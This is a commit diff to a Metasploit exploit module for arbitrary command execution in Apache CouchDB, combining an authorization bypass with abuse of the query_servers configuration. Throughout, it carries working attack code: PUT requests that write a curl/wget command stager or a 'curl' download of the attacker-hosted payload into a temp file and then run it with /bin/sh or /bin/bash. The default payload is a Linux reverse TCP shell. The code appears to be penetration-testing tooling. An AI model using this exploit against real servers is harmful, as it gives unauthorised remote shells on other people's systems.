Use cmdstager method, update function to clean file, delete lots of useless code and etc.
parent
c0be313691
commit
3c5cbd2664
|
@ -7,11 +7,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache Couchdb Arbitrary Command Execution',
|
||||
'Name' => 'Apache CouchDB Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
CouchDB administrative users can configure the database server via HTTP(S).
|
||||
Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.
|
||||
|
@ -32,19 +32,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Apr 6 2016',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4096, # Has into account Apache request length and base64 ratio
|
||||
'DisableNops' => true
|
||||
},
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/reverse_bash'
|
||||
'PAYLOAD' => 'linux/x64/shell_reverse_tcp',
|
||||
'CMDSTAGER::FLAVOR' => 'curl'
|
||||
},
|
||||
'CmdStagerFlavor' => ['curl', 'wget'],
|
||||
'Targets' => [
|
||||
['Automatic', {} ]
|
||||
['Automatic', {} ],
|
||||
['Apache CouchDB version 1.x', {} ],
|
||||
['Apache CouchDB version 2.x', {} ]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
@ -57,7 +56,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
])
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.'])
|
||||
OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),
|
||||
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -76,14 +76,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
@exploit_flag = false
|
||||
fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't access the server.") unless get_version
|
||||
fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
|
||||
version = @version
|
||||
|
||||
vprint_good("#{peer} - Authorization bypass successful") if auth_bypass
|
||||
|
||||
start_http_server
|
||||
print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager")
|
||||
@cmdstager = generate_cmdstager(
|
||||
'Path' => "/#{Rex::Text.rand_text_alpha_lower(8)}",
|
||||
:temp => datastore['WritableDir'],
|
||||
:file => File.basename(cmdstager_path),
|
||||
:nospace => true
|
||||
).join(';')
|
||||
|
||||
if !datastore['Attempts'] || datastore['Attempts'] == 0
|
||||
if !datastore['Attempts'] || datastore['Attempts'] <= 0
|
||||
attempts = 1
|
||||
else
|
||||
attempts = datastore['Attempts']
|
||||
|
@ -96,6 +102,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# break if we get the shell
|
||||
break if @exploit_flag
|
||||
end
|
||||
|
||||
print_status("Shutting down the web service...")
|
||||
stop_service
|
||||
end
|
||||
|
||||
# CVE-2017-12635
|
||||
|
@ -149,7 +158,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
if res && res.code == 200
|
||||
res_json = res.get_json_document if res
|
||||
res_json = res.get_json_document
|
||||
|
||||
if res_json.empty?
|
||||
vprint_bad("#{peer} - Cannot parse the response, seems like it's not CouchDB.")
|
||||
return false
|
||||
end
|
||||
|
||||
@version = res_json['version'] if res_json['version']
|
||||
return true
|
||||
end
|
||||
|
@ -159,19 +174,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def send_payload(version)
|
||||
vprint_status("#{peer} - version is #{version}") if version
|
||||
vprint_status("#{peer} - CouchDB version is #{version}") if version
|
||||
|
||||
version = Gem::Version.new(@version)
|
||||
case
|
||||
when version < '1.7.0'
|
||||
# Version not found
|
||||
when version.version.empty?
|
||||
|
||||
vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.")
|
||||
# if target set Automatic, exploit failed.
|
||||
if target == targets[0]
|
||||
fail_with(Failure::NoTarget, "#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.")
|
||||
elsif target == targets[1]
|
||||
payload1
|
||||
elsif target == targets[2]
|
||||
payload2
|
||||
end
|
||||
|
||||
when version < Gem::Version.new('1.7.0')
|
||||
payload1
|
||||
when version.between?('2.0.0','2.1.0')
|
||||
when version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
|
||||
payload2
|
||||
when version >= '1.7.0' || version > '2.1.0'
|
||||
when version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
|
||||
else
|
||||
# Version not found, try randomly payload
|
||||
vprint_warning("#{peer} - Cannot retrive the version, exploiting randomly...")
|
||||
send([:payload1,:payload2].sample)
|
||||
|
||||
end
|
||||
|
||||
|
@ -186,14 +211,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_hex = Rex::Text.rand_text_hex(32)
|
||||
rand_file = "/tmp/" + Rex::Text.rand_text_alpha_lower(8..16)
|
||||
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
|
||||
@file_to_clean = rand_file
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %Q{"curl #{@service_url} > #{rand_file}"}
|
||||
'data' => %Q{"echo '#{@cmdstager}' > #{rand_file}"}
|
||||
|
||||
)
|
||||
|
||||
|
@ -222,7 +247,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %Q{"/bin/bash #{rand_file}"}
|
||||
'data' => %Q{"/bin/sh #{rand_file}"}
|
||||
)
|
||||
|
||||
res = send_request_cgi(
|
||||
|
@ -232,6 +257,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'ctype' => 'application/json',
|
||||
'data' => %Q{{"language":"#{rand_cmd2}","map":""}}
|
||||
)
|
||||
|
||||
|
||||
end
|
||||
|
||||
# payload2 is for the version of couchdb below 2.1.1
|
||||
|
@ -243,7 +270,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)
|
||||
rand_hex = Rex::Text.rand_text_hex(32)
|
||||
rand_file = "/tmp/" + Rex::Text.rand_text_alpha_lower(8..16)
|
||||
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
|
||||
|
||||
@file_to_clean = rand_file
|
||||
|
||||
|
@ -259,7 +286,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %Q{"curl #{@service_url} > #{rand_file}"}
|
||||
'data' => %Q{"echo '#{@cmdstager}' > #{rand_file}"}
|
||||
|
||||
)
|
||||
|
||||
|
@ -288,7 +315,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"),
|
||||
'method' => 'PUT',
|
||||
'authorization' => @auth,
|
||||
'data' => %Q{"/bin/bash #{rand_file}"}
|
||||
'data' => %Q{"/bin/sh #{rand_file}"}
|
||||
|
||||
)
|
||||
|
||||
|
@ -301,61 +328,47 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
)
|
||||
end
|
||||
|
||||
def cmdstager_path
|
||||
@cmdstager_path ||=
|
||||
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
|
||||
end
|
||||
|
||||
#
|
||||
# Override methods
|
||||
#
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if (not @pl)
|
||||
if (not @cmdstager)
|
||||
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
|
||||
return
|
||||
end
|
||||
|
||||
vprint_status("request headers is #{request.headers['User-Agent']}") if request.headers['User-Agent']
|
||||
|
||||
if request.headers['User-Agent'] !~ /curl/
|
||||
print_status("Sending 404 for User-Agent #{request.headers['User-Agent']}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
|
||||
send_response(cli, @pl)
|
||||
print_status("Sending payload #{datastore['PAYLOAD']}")
|
||||
super
|
||||
|
||||
end
|
||||
|
||||
def start_http_server
|
||||
@pl = payload.encoded
|
||||
|
||||
resource_uri = datastore['URIPATH'] || random_uri
|
||||
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
|
||||
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
|
||||
else
|
||||
srv_host = datastore['SRVHOST']
|
||||
end
|
||||
|
||||
# do not use SSL for the attacking web server
|
||||
if datastore['SSL']
|
||||
ssl_restore = true
|
||||
datastore['SSL'] = false
|
||||
end
|
||||
|
||||
@service_url = "http://#{srv_host}:#{datastore['SRVPORT']}/#{resource_uri}"
|
||||
service_url_payload = srv_host + resource_uri
|
||||
vprint_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
on_request_uri(cli, req)
|
||||
},
|
||||
'Path' => resource_uri
|
||||
}})
|
||||
datastore['SSL'] = true if ssl_restore
|
||||
connect
|
||||
def start_service(opts = {})
|
||||
super
|
||||
@service_url = get_uri
|
||||
end
|
||||
|
||||
|
||||
# mark the exploit successful and clean temp file created during exploiting
|
||||
def on_new_session(client)
|
||||
# mark flag be true to stop exploit.
|
||||
@exploit_flag = true
|
||||
|
||||
# CmdStager should rm the file, but it blocks on the payload, so we do it
|
||||
@file_to_clean << " #{cmdstager_path}"
|
||||
vprint_status("Cleaning temp file #{@file_to_clean}")
|
||||
begin
|
||||
client.shell_command_token("rm #{@file_to_clean}")
|
||||
if client.type.eql? 'meterpreter'
|
||||
client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
|
||||
client.fs.file.rm @file_to_clean
|
||||
else
|
||||
client.shell_command_token("rm #{@file_to_clean}")
|
||||
end
|
||||
vprint_good("Cleaned temp file successful.")
|
||||
rescue
|
||||
print_warning("Need to clean the temp file #{@file_to_clean} manually.")
|
||||
|
|
Loading…
Reference in New Issue